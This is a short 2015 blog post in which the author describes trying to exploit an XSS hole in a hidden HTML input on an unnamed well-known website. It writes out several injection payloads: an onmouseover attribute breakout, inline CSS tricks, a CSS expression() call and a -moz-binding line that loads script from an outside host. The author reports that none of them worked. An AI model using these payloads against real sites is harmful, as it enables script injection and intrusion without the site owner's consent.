Saturday, 10 January 2015

Xss in hidden input. Possible?

While I was trying to find a way to exploit a vulnerable html hidden input on a famous website (the < > were sanitised). I have gathered some information trying many different techniques that might help on different website.
The vulnerable input looks something like this:

<input id='myInput' type='hidden' value='dynamic'/> 

It could break with a single quote ' onmousover="alert(1)" . And that would become:

<input id='myInput' type='hidden' value='dynamic' onmouseover="alert(1)" />

Unfortunately even if we break the input with onmouseover nothing happens because there is nothing visible in our page to hover. And neither all of the other attributes worked including onchange.

Can we overwrite the Type field by rewriting type="text"?
No that's not possible any more.

What if we style it inline with css and make it visible with the examples below:
style="display: block;width: 999px;height: 999px;"
style="display: inline;width: 999px;height: 999px;"
style="visibility: visible;"
None of that worked in this case as the CSS couldn't overwrite the html attribute.

Maybe try to fire up javascript within css:
style = width: expression(alert('xss'));"
style="-moz-binding:url('http://ha.ckers/xss.js');
No luck...

Haven't found a way to bypass this yet.

sources:
owasp.org
sla.ckers.org